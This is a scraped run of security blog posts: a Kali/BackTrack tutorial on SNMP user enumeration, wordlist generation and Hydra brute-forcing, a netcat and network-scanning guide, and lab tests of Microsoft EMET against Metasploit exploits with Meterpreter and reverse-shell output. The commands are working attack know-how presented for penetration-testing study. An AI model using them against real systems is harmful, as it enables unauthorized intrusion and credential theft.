root@kali:~# onesixtyone -c /usr/share/doc/onesixtyone/dict.txt -i /tmp/host-snmp.txt

The dict.txt is a wordlist (another one) of possible community strings and it is already present in Kali; the host-snmp.txt is a file with the IPs of all hosts with the SNMP service active in the network. The word in the square brackets (see Figure 3) is what you are searching for and the next step is to use this word combined to Snmpcheck to extract data from the service.

OneSixtyOne

Figure 3

root@kali:~# snmpcheck -t 192.168.34.135 –c admin | grep -a “User accounts” -A 11
[*] User accounts
-----------------
Administrator
Guest
IUSR_HP-SRV01
IWAM_HP-SRV01
SUPPORT_388945a0
albert
krbtgt
jodie
user
expert

In this example the output is limited to the user accounts (grep -a “User accounts” -A 11), but you can get much more info using SNMP such as processes running, programs installed, open ports, network and routing configurations, storages information and much more.

There are several ways to find a username in the net: if something similar to PC-pedro or Maria’s MacBook is found the assumption is that Pedro and Maria are likely to be usernames that will have access on these computers. It’s important to compile the user list meticulously and add every possible username you find, so you can use it later.

Finally you have a user list that will help you in a first simple password attack.
If you will have no results you’ll wish to make some simple extensions to that list using John the Ripper (JtR) or you’ll try another small wordlist like /usr/share/john/password.lst; also in this case JtR can be used to make some little changes.
Let’s see some usage of John the Ripper password cracker by Openwall. Note that this program does more than what you’ll read here. You will see now, how make some simple mutations in order to upgrade your user list and use it as a password list.
The idea is to create something that leads from an input as ‘root’ to an output like Root, ROOT, rootroot, toor, Root1 and so on. Well, let’s expand a small file (wordlist.lst) with only ‘root’ and ‘password’:

root@kali:~# john -w=wordlist.lst --rules --stdout | tr -s '\n' ' '
words: 100  time: 0:00:00:00 100%  w/s: 10000  current: Passwording
root password Root Password roots passwords root1 password1 Root1 Password1 rootroot toor drowssap 1root 1password ROOT PASSWORD root2 password2 root! password! root3 password3 root7 password7 root9 password9 root5 password5 root4 password4 root8 password8 root6 password6 root0 password0 root. password. root? password? psswrd RootRoot tooR drowssaP Toor Drowssap roottoor rooT passworD 2root 2password 4root 4password Root2 Password2 Root! Password! Root3 Password3 Root9 Password9 Root5 Password5 Root7 Password7 Root4 Password4 Root6 Password6 Root8 Password8 Root. Password. Root? Password? Root0 Password0 3root 3password 7root 7password 9root 9password 5root 5password 6root 6password 8root 8password Roots Passwords rooted passworded rooting passwording Rooted Passworded Rooting Passwordin

In this case a default rule set is used (--rules), but you can modify it using /etc/john/john.conf; note that with 2 words JtR generates 100 words instantly.
The output is normalized, in this case, using tr -s '\n' ' ', but you can remove this part of command and redirect all in a file that fits your needs. Later,
talking about offline attacks, you’ll come across JtR again and you’ll find some other awesome features. Even though, I think, using a huge wordlist is not a good idea, it can be useful to know how to make it, so here are two great tools.
The first is CeWL, you can use it to dig a Company web site to extract words and convert these in a list. The basic usage is very simple and the impact awesome:

cewl www.fakesitelab.com > /tmp/wordlist.txt

You can even use it to extract usernames by pointing CeWL to sites that collect popular birth names. Similarly you can use it to create monothematic wordlists: animals, plants, countries, cars, “Lord of the Rings”, topic words and so on.
The concept I’d like to remark is that in an online password attack you are connected to the LAN: you make network traffic, you stress systems and you can’t stay there all night and day long.
The second tool is Crunch. It can be used to create a word list too, but starts from a different point of view compared with CeWL. Crunch is more like a bruteforce: it generates all words using some parameters you set. Essentially you establish min and max length and a charset (or use the default one); so you can create all possible combinations of characters a, b, c with length from 2 to 4 using the following command:

root@kali:~# crunch 2 4 abc

More specific and interesting usage can be read in the manual page, like the -t option: you can take one word and append some characters to it:

@@god@@@@ where the only the @’s, ,’s, %’s, and
^’s will change.
@ will insert lower case characters
, will insert upper case characters
% will insert numbers
^ will insert symbols

The output can be sent to the screen, to a file, or to another program; this last option allows the use of Chunch directly on an online/offline cracking operation without physically generating a wordlist, saving hard disk space.

Online Password Attack
One of the best tools to complete the online attack is Hydra. This program is tasked to join your lists and to perform the attack over a network service.
The figure 4 explains how it works: it puts together a username list, a password list and a host list split by services to attack (FTP, RDP, SSH, MySQL…).
Then it starts to try every username and password associations on every hosts. Some other parameters can be set such as proxy or the number of tasks; very useful when attacking some cranky service like RDP.

An operation diagram of the operation of THC-Hydra

Figure 4

The following is the command that performs a wordlist attack against all FTP hosts in the net:

root@kali:~# hydra -s 21 -V -L /tmp/users.txt -P /tmp/passwords.txt -e nsr -t 16 -M /tmp/FTP_hosts.txt ftp

The -L, -P and -M options are used to point to the wordlists of users, passwords and hosts and can be replaced by -l, -p and a IP to use a single name, password or target. -s is the port to attack and the ftp at the end is the service used as target. -V stands for verbose and -e option tries n null password, s login as pass and/or r reversed login. Finally -t is the number of task that Hydra will use.
The simplest way to learn the use of this tool is to take a look at the GUI xHydra (see Figure 5).

xHydra

Figure 5

Hydra is the end (maybe happy) of the online password attack, but it is no more than a task executor. Its force lies in the wordlists you will be able to create, don’t forget this.

[end of part 1]

]]>
https://www.gosecure.it/blog/art/391/sec/the-password-attacks-on-kali-linux-part-1/feed/ 0
Penetration Test – Ghatering Phase. [Part 2] https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/ https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/#respond Tue, 13 Aug 2013 07:59:54 +0000 https://www.gosecure.it/blog/?p=333 read more)]]> This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so If you are interested on it you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 2 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 2]

Find your account
As for the hosts, users discovering can be done using many methods. You can scan Google searching for email accounts of your target company, explore corporate Web pages looking at pdf or word documents and who are the creators of this documents; if you have access to the LAN you are testing, you can try to get information from SNMP or SMTP protocol. Below are some scripts and programs that will help you, present in BT.
The harvest, by Edge-Security Research, is a very useful one. It searches for a company name in various resources database (Google, Linkedin, PGP, Bing) and can be used to extract probable username. In Figure 5 you can see the result of a research: maybe vdiaz, cdelojo, cmartorella, and xmendez are also FTP, SSH or RDP users.
Again by Edge-Security.com, you can use metagoofil (/pentest/enumeration/google/metagoofil/) to try to find users that create documents, downloadable from the domain you point at, such as docs or pdfs.

Maybe we have found some accounts

Figure 5

As well as using Web search to catch company users’ names/usernames, you can try to obtain information by SNMP or SMTP.
SNMP is a protocol based on UTP that is often used to monitor server service status. The authentication methods (community strings) are passed in clear and often have the default state (public or private), so you can easily try to find it in order to get many information.
You can use programs such Snmpenum and Onesixtyone for this. Let’s see how they work.
Initially you have to use Onesixtyone to enumerate comunity strings; with the info collected before, make a list of hosts and write it down to a file (/tmp/hosts.txt), then point to pentest/enumeration/snmp/onesixtyone and do the following:

root@bt:pentest/enumeration/snmp/onesixtyone# ./onesixtyone -c dict.txt -i /tmp/hosts.txt -o /tmp/log.txt

In this command you use a file dict.txt, already present in the onesixtyone folder, to ‘brute force’ the community strings; you use the hosts file you have found before to set targets and, at the end, make a log file.
In Figure 6 you can find a sample of what you can get. In the sample you see some printers, some switches and a server (192.168.1.10).

Onesixtyone log

Figure 6

Go on and use snmpenum over 192.168.1.10 setting ‘public’ as community string, and the windows.txt template (already present) to merge output information (see Figure 7).

Snmpenum at work

Figure 7

This is just a sample, but you can get much more information than these using SNMP. You can find processes running, opened ports, system information and much more.
For now, limit yourself to the users. What you want is to create a document like hosts.txt but with possible user names.
There are many other methods to identify users such as using SMTP server (smtpscan) and try to test the VRFY functionality (smtp-user-enum). Spidering a target website to collect unique words (/pentest/password/cewl) or sniffing network traffic (Wireshark) can also be useful. In the Backtrack > Information Gathering > Network analysis menu you can find many tools to reach your target. Try to find as many names as you can, but do not forget to add to your list the most common user names (root, admin, administrator).

Map the NET
Let’s have a look at network scanners, limiting us to a simple scan, with the only objective to find some services that can be used as a target.
Please, make sure to keep in mind that scanners are much more than what you will read here.
Of course, NC can be used as a network scanner, but the best programs are Unicorscan and Nmap so let’s start with the first one. The commands in Figure 8 perform a simple scan, pointing at a single target (192.168.34.135), testing common TCP (-m T) and UTP (-m U) ports, typically those used by common services such as FTP, SSH, SMB, MySQL. The last command in Figure 8 is a scan of all the subnet 192.168.34.*, but only on FTP, SSH, SMB, and RDP ports.

Some basic scans using Unicornscan

Figure 8

You can perform the same thing using Nmap. The command nmap 192.168.34.135 scans TCP common port; if you add -sU option it will scan UDP ports. The single target can be replaced with 192.168.34.*, 192.164.34.0/24 or your hosts.txt to explore all subnet or specific IPs; adding the option
-p 21-23,3389 you will limit the scan to port 21, 22, 23 and 3389. The result will be probably the same but if you try Nmap you will see more information. In addition, it can be quickly implemented to determinate what kind of program is listening over the port discovered (-sV) and what operating system is installed (-O). Please, take a look at the Nmap help to learn more options and remember that man command or help are always your friends. If you are afraid to use the Terminal, use the Nmap GUI: Zenmap.
You have to remember that every GUI is at least one layer over its command-line program; anyway let’s use the graphic interface of Nmap and try to find FTP, SSH, Telnet and RDP services in the subnet (Figure 9).
Scanners make a list of hosts using FTP, another one of hosts using RDP, and so on.

Nmap GUI

Figure 9

Get the Keys
Well done! You have completed your basic network gathering phase, now you can merge all your lists and launch your first attack. What do you need? A username list, a file listing hosts with the specific service, a password list, and a program to put everything together. You don’t have the password list, but one can be easily found in the folder /pentest/password/wordlist/ or by a search on the Web. The kind of attack you will do is called ‘wordlist attack’: it is not the most elegant way to perform a penetration test, but it may be very incisive.
The program you can use to join your lists is Hydra (or its GUI xHydra). Figure 10 explains how it works.
Open the Hydra GUI (Privilege Escalation > Password Attacks > Online Attacks > Hydra-gtk)
and, in the Target tab, insert the target list (e.g.FTP_hosts.txt), the port to test and the protocol (21 / FTP).

An operation diagram of the operation of THC-Hydra

Figure 10

The options ‘Show attempts’ and ‘Be verbose’ are useful to better understand what the program does. Go in the Password tab and insert the user and the password lists; don’t forget to check ‘try login as password’ and ‘try empty password’. For a basic test don’t use Tuning and Specific tabs; move to the Start tab and run the attack. It takes a while, but I Hope you can find some user and password association.
You can also try to extend your lists to have more chances, but remember that such attack may take a very long time. In a pen test you must have a very strong reason to spend 8 or more hours for a word list attack.
Anyway, if you find some associations, write them down and be ready to reuse it: users are used to use the same password for more than one service.
You can start to write a file with user:password, you will use it on Hydra in the Password tab instead of users and passwords lists. When you discover a new service, you can first use Hydra with the new file created and then the lists of users and passwords. This will speed up your work.

I hope you now have the user/password to access the FTP, SMB or, if you are lucky, the SSH, or RDP.
This is not the end of the test, this is the beginning. You will use this access to gain more information and to find more vulnerability all over the LAN.
But what about if you can’t find anything? Don’t worry, these are just the first arrows in your quiver. After these, you can try many other things such as web vectors, exploit some vulnerability, or ARP poissoning. There are so many options that the only limit is you and every discovery is the start for the next one.

So when you open a new port, restart from the beginning, restart from sharpenning your axe.

]]>
https://www.gosecure.it/blog/art/333/sec/penetration-test-ghatering-phase-part-2/feed/ 0
Penetration Test – Ghatering Phase. [Part 1] https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/ https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/#respond Tue, 23 Jul 2013 13:17:57 +0000 https://www.gosecure.it/blog/?p=210 read more)]]> This is a part of my article “Sharpen your axe with BackTrack – Gathering phase” published on PenTest Magazine and Hakin9 magazine. I have the right to do up to 100 downloads of these magazines, so If you are interested on it you can download PenTest Extra BackTrack Compendium 03_20132 or Hakin9 starter kit 03_20131 for free using the 3 following links. The only thing you need is a free registration.
–   PenTest Extra Compendium
–   Hakin9 Starter kit.
–   PenTest OPEN 06/2013.

Sharpen your axe with BackTrack – Gathering phase [Part 1]

Abraham Lincoln said ‘Give me six hours to chop down a tree and I will spend the first four sharpening the axe’. This is really the basic concept and the start point of every penetration test.

In a pen test you have to sharpen your axe first by gathering information. The more you obtain, the more surface to attack you will have. The gathering phase isn’t the most exciting one, but surely it is the one that will let you make things better and smarter. So what do you need? Let’s see.
First, you need an adequate system with the right toolkit and a little knowledge of how they work. We will use one of the latest versions of BackTrack (BT) because it is a powerful and widespread operating system, so it will be quite simple to get support or tutorials on the Web: Youtube has a video for almost all the BT tools.
The best way to start with BT is virtualization: you can download its virtual machine ready to be started. In addition, using virtualization, you can easily start a cheap and smart LAB to perform your tests. If you already have a test network, you can also use the bootable CD.

Next you have to be calm and patient, only this way you can collect information and inspect them rightly. You can make your own check-list of tests to do or copy one from the Web, but, when you have your list, you have to follow it meticulously. Remember that you are sharpening.

Now you need to write down all the data you collected in order to have everything recorded so that you can analyze it even when you aren’t connected to the LAN you have to test. Furthermore you will use these records to make a detailed report for your customer or to roll back in case you mess something up.
I use Keepnote to keep track of all my operations and results and Zenmap (Nmap GUI) to map the net, but BT has many more powerful tools than these. Maltego, for example, is awesome.

My friend Netcat
Now let’s start to use the father of all tools, the famous ‘Swiss-army knife for TCP/IP: Netcat‘. Essentially, NC, is a utility which reads and writes data across network connections, using TCP or UDP transport. Nothing more, nothing less.
So why is it so important? When a PC user without experience wants to test if his machine is browsing the Internet, he opens his browser and points to a common address: www.google.com.
This is not the best test he could do, he only finds out if he is browsing, but what about if he is not browsing? So the approach must be different. He has to start from a layer closer to the PC, not closer to the user, and investigate the causes, step by step, up to the human layer.
You are not an inexperienced person, so you start by opening a command shell and pinging your gateway. Is it responding? If not, check it. Then ping an external IP address (e.g. 8.8.8.8 that is the Google DNS). Is it responding? Alright, you are able to go out of your network. Next you test if your DNS is working by pinging a DNS name like www.google.com. Only if all works fine, you open your browser and test the connection. Also, from the browser you can have a problem (e.g. a misconfigured proxy set in the browser) but, after all the tests you have done previously, you can rule out all lower layers and focus on the current one.
That’s why NC is so important. It allow you to start from the lowest layer, it is the equivalent of the ping command used in the example, but it has many more applications.

Well, open your Terminal window and have a look at the NC help.

root@bt:~# nc -h
[v1.10-38]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-c shell commands as `-e'; use /bin/sh to exec [dangerous!!]
-e filename program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-k set keepalive option on socket
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-T tos set Type Of Service
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive];
hyphens in port names must be backslash escaped (e.g. 'ftp\-data').

At the beginning you will use options -l(set NC in listening mode), -v (verbose mode is always better) and -p (set port where NC is listening).Try this:
Open two Terminal windows in the same machine. In the first window start a service that listens
on a specific port using Netcat (it is called the listener).

root@bt:~# nc -lvp 4444

If you have a look at the network connection of your BT machine, using the command netstat -nat, you will find a listening connection on port 4444 (tcp 0.0.0.0:4444 LISTEN).
In the second window use NC as a client and connect to localhost on port 4444

root@bt:~# nc 127.0.0.1 4444 -v

Hit enter and you establish a simple connection with NC, but what is this?
Essentially, it is a simple chat. If you write something in window 1, it will redirect to windows 2 andvice versa (see Figure 1).

Netcat simple chat

Figure 1

So NC is a program that allows you to communicate using TCP or UDP protocols and you can use it whether as a client or as a server. TCP/UDP connections are more useful than a simple chat: you can use NC to test if a remote port is open, to grab information about a service listening on a remote PC (the banner) and to connect to this service; otherwise you can use it to redirect text, request html page, and, last but not least, remotely admin a PC.
If you have two PCs try to use NC between them or just continue the testing in the same machine (that is the lower layer).
For example, you can try to pass text:

root@bt:~# echo 'This text will be transmitted using Netcat'| nc 127.0.0.1 4444

…and if the listener is as the following, you can also
create a file with the text sent:

root@bt:~# nc -lvp 4444 > file.txt

You can also try the -c option for remote administration.
I suggest you to dig the Internet to search more about Netcat use.

Network hosts identification
As I said, finding information about the target is the base of a successful test. What is the first thing you have to do when you reach a LAN you have to check? Find hosts to use as targets. If you can, create your own hosts individuation scripts using ping and NC or use some of the wonderful tools present in BT. In my opinion, the best are Unicornscan and Nmap, but, since I will shortly explain them later, let’s explore some other programs with less possibility, but working as well.
Start using netdiscover to find live hosts. Using netdiscover -P a network scan is started using common LAN address (the one you are connected to) (see Figure 2).
Netdiscover can be also used on another network interface (-i) and IP range (-r). The -P option is useful for a better output. Netdiscover is a continuing scan tool: it scans over and over the net in order to find new hosts and it could be used to
implement a very simple intrusion detection system. To stop the scan you have to use [CTRL+C].
In a similar way you can use fping with option -g to analyze a range of IPs. Note that fping uses ICMP protocol, whereas netdiscover uses ARP protocol to locate network hosts – this is a good double check.

Netdiscover at work

Figure 2

Don’t forget to write down everything and trace all. Particularly start to compile a list of live hosts. You can also try to give a DNS name to the hosts you find using smbscan, but you will notice that the program can find only a few, those with net bios name enable.
Let’s now try to find something more using DNS discovering. If you are in a domain or if you are scanning for DNS name in the Web, you can try to operate a DNS zone transfer and capture DNS records.
When you can perform this operation, you get other sensible information and, maybe, hosts not previously discovered.
The DNS transfer zone is a query that synchronizes Primary and Secondary DNS servers but if administrators misconfigure them, everyone can query for transfer and get all DNS records. DNSenum is a tool that tries to make a zone transfer and catch the results. The basic operation is quite simple: you just have to set the domain name to target.
Note that you can try the zone transfer both on a local (see Figure 3) or an Internet domain (see Figure 4).
You have to notice that a DNS zone transfer, even if successfully done, does not give hackers a direct access to the servers, but gives them many information that can be useful to expand the attack surface. Look at Figure 4; the DNS transfer zone highlights at least 3 attack vectors: webmail, ftp, sftp.

DNS zone transfer on a local domain using host

Figure 3

DNSenum on a Web domain

Figure 4

It is therefore essential to block all the attacks and scans you can. Also ARP and ICMP scans must be stopped in a protected LAN. Unfortunately this isn’t always practicable: in a Microsoft domain, for example, some administrative system tools do not work with restrictive local firewall policies.
It is not easy to find balance between security and efficiency.

You have done a good hosts analysis and you have a list of IPs alive in the network. Now you can start user account identification.

[end of part 1]

You can find other NetCat info in this post

]]>
https://www.gosecure.it/blog/art/210/sec/penetration-test-ghatering-phase-part-1/feed/ 0
EMETv4 – Part 2 https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/ https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/#respond Mon, 24 Jun 2013 14:50:14 +0000 https://www.gosecure.it/blog/?p=169 read more)]]> [begin of phase 2] Take a look at the [phase 1]

I continue my tests about EMETv4. This time I’ve installed EMETv4 on the same machine HP-CLI01 and HP-SRV01 (note that framework 4 is required ). The only configuration I set is the “recommended” one.

Test4
Target: Windows Server 2003 SP2 eng; Host Name: HP-SRV01; IP Address: 192.168.34.135
Vulnerability: CVE-2008-4250 (SMB)
Exploit used: ms08_067_netapi from metasploit
EMET agent: installed with recommended settings.

This is MSFConsolle ouput of the exploit:

msf  exploit(ms08_067_netapi) > info

       Name: Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
    Version: 16002
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  hdm <hdm@metasploit.com>
  Brett Moore <brett.moore@insomniasec.com>
  staylor
  jduck <jduck@metasploit.com>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.34.135   yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.34.132:33899
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] We could not detect the language pack, defaulting to English
[*] Selected Target: Windows 2003 SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.34.135
[*] Meterpreter session 1 opened (192.168.34.132:33899 -> 192.168.34.135:1091) at 2013-06-19 20:11:50 +0200

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                          Path
 ---   ----  ----               ----  -------     ----                          ----
 0     0     [System Process]         4294967295                                
 4     0     System             x86   0           NT AUTHORITY\SYSTEM          
 268   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 316   268   csrss.exe          x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 340   268   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 388   340   services.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 400   340   lsass.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 568   388   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 588   388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 760   388   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 816   388   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 872   388   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 888   388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1160  888   wmiadap.exe        x86   0           NT AUTHORITY\SYSTEM           \\?\C:\WINDOWS\system32\WBEM\WMIADAP.EXE
 1164  388   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1200  388   msdtc.exe          x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\msdtc.exe
 1284  388   cisvc.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\cisvc.exe
 1344  388   dfssvc.exe         x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\Dfssvc.exe
 1376  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1460  388   inetinfo.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1480  388   ismserv.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\ismserv.exe
 1500  388   ntfrs.exe          x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\ntfrs.exe
 1624  388   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1664  388   SLadmin.exe        x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLadmin\SLadmin.exe
 1788  388   SLSmtp.exe         x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLmail\slsmtp.exe
 1848  388   vmtoolsd.exe       x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1876  388   tcpsvcs.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\tcpsvcs.exe
 1964  388   SLMail.exe         x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\SLmail\SLmail.exe
 2104  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2336  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 2404  388   TPAutoConnSvc.exe  x86   0           NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2464  388   dllhost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe
 2612  388   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 2644  588   wmiprvse.exe       x86   0           NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 2824  388   svchost.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 3060  588   wmiprvse.exe       x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\wbem\wmiprvse.exe
 3380  3352  explorer.exe       x86   0           HP\Administrator              C:\WINDOWS\Explorer.EXE
 3444  2404  TPAutoConnect.exe  x86   0           HP\Administrator              C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 3488  3380  vmtoolsd.exe       x86   0           HP\Administrator              C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3596  388   msiexec.exe        x86   0           NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\msiexec.exe
 3924  888   wuauclt.exe        x86   0           HP\Administrator              C:\WINDOWS\system32\wuauclt.exe
 4016  3560  EMET_Agent.exe     x86   0           HP\Administrator              C:\Program Files\EMET 4.0\EMET_Agent.exe


meterpreter > sysinfo
Computer        : HP-SRV01
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >

The target is powned. Take a look at the process number 4016: 4016  3560  EMET_Agent.exe
The EMET_Agent is running but the exploit still works.

Test 5
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2008-4250 (IE6)
Exploit used: ms10_002_aurora from metasploit
EMET agent: installed with recommended settings.

I setup the exploit exactly as test 2 but this time EMET works well and stops me.
When I start IE6 on the target machine and point to the evil page the aurora exploit cause the crash of Internet Exploter as wished. so I restart the target machine and retry: same result, IE6 crash. I want to double check this and I exclude iexplorer.exe from EMEC configuration and this time the exploit has worked.

This is a drow: exploit 1 – EMEC 1.

Test 6
Target: Windows XP SP3 eng; Host Name: HP-CLI01; IP Address: 192.168.34.134
Vulnerability: CVE-2003-0264 (slmail55_4433)
Exploit used: my version of this well known exploit
EMET agent: installed with recommended settings.

Also in this case, with defaul settings the exploit works:

root@bt:~# nc 192.168.34.134 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\SLmail\System>tasklist
tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        236 K
smss.exe                     540 Console                 0        388 K
csrss.exe                    604 Console                 0      4,172 K
winlogon.exe                 628 Console                 0      5,032 K
services.exe                 672 Console                 0      3,348 K
lsass.exe                    684 Console                 0      1,532 K
vmacthlp.exe                 844 Console                 0      2,328 K
svchost.exe                  860 Console                 0      4,860 K
svchost.exe                  944 Console                 0      4,348 K
svchost.exe                 1036 Console                 0     18,140 K
svchost.exe                 1092 Console                 0      3,340 K
svchost.exe                 1224 Console                 0      4,236 K
spoolsv.exe                 1536 Console                 0      5,568 K
explorer.exe                1556 Console                 0     18,664 K
vmtoolsd.exe                1688 Console                 0     13,560 K
SLadmin.exe                 2020 Console                 0      3,076 K
SLSmtp.exe                   272 Console                 0      4,720 K
vmtoolsd.exe                 324 Console                 0     11,396 K
TPAutoConnSvc.exe            312 Console                 0      3,868 K
wscntfy.exe                 1368 Console                 0      1,964 K
alg.exe                     1816 Console                 0      3,416 K
TPAutoConnect.exe           2448 Console                 0      4,048 K
wuauclt.exe                 3200 Console                 0      5,048 K
SLMail.exe                   564 Console                 0      4,940 K
msiexec.exe                 3768 Console                 0      8,256 K
EMET_Agent.exe              3752 Console                 0     27,960 K
cmd.exe                     3988 Console                 0      2,432 K
tasklist.exe                3980 Console                 0      4,076 K
wmiprvse.exe                1628 Console                 0      5,528 K

C:\Program Files\SLmail\System>hostname
hostname
hp-cli01

C:\Program Files\SLmail\System>ipconfig | findstr Address ipconfig | findstr Address
        IP Address. . . . . . . . . . . . : 192.168.34.134

C:\Program Files\SLmail\System>

Again, after a reboot, EMET doesn’t stop the attack, so I try to adjust some settings. If I modify the profile template from “recommended” to “maximum” and reboot, EMET doesn’t allow the execution of code: the DEP block the execution from the address space. I double check it and retry my attack with basic settings: the exploit is not stopped. Also in this case let’s take 2 steps back and debug the application while EMET is blocking the execution (Image1)

Image 1

Image 1


The overflow works, writing “A” up to the overwriting of the EIP but when it has to execute the payload it is stopped with message “Access violanion when executing 01C7A154”. That is actualy the address where my payload start to be executed.

Conclusions
I consider the EMET idea extremly useful and I think that this program, if implemented, will be able to increase the system security. Nowaday the bigest problems, from my viewpoint, are:
– not all moules are present and activated (SEHOP e ASLR)
– not all installed programs are controlled by default
– On my tests, on Windows XP, I have a problem with the EMET_agent when start the GUI (image2) and when I reboot (image3).
– I would be happier if FrameWork4 is not a requirement.

Image 2

Image 2

Image 3

Image 3


In this situation I will never install this program on a production server, but I will surely follow it, waiting for its evolutions.

]]>
https://www.gosecure.it/blog/art/169/sec/emetv4-part-2/feed/ 0
EMETv4 – Part 1 https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/ https://www.gosecure.it/blog/art/132/sec/emetv4-part-1/#respond Thu, 20 Jun 2013 12:00:56 +0000 https://www.gosecure.it/blog/?p=132 read more)]]> The theory
Microsoft has relased the full edition of the free software EMETv4 “Enhanced Mitigation Experience Toolkit”. The Company puts together some tecnologies such ASLR and DEP to mitigate the risk of system hacking; first of all the “Zero day” attacks. This, thanks to DEP and ASLR, will not only patch Microsoft software, but all software installed. The DEP (Data Execution Prevention) is a technology that associates services or applications to non-executable memory region and blocks code executions from this area (buffer overflow). The ASLR (Address space layout randomization) randomize the address that the application use. If someone bypass the buffer overflow protection and write a script to exploit it, the return address he has to overwrite in the instruction pointer register (EIP or RIP) to redirect the exploit to the payload, is everytime different. This makes considerably more difficult the replica of the exploit.
Well, this is what I understand…therefore there is no other options, I have to test it.

The practice
I will test 3 attacks:
– To Operating system vulnerability (SMB)
– To Microsoft software (IE6)
– To non Microsoft Software (SLMail)

Target machines:
– Windows XP SP3 eng (Host Name: HP-CLI01; IP Address: 192.168.34.134)
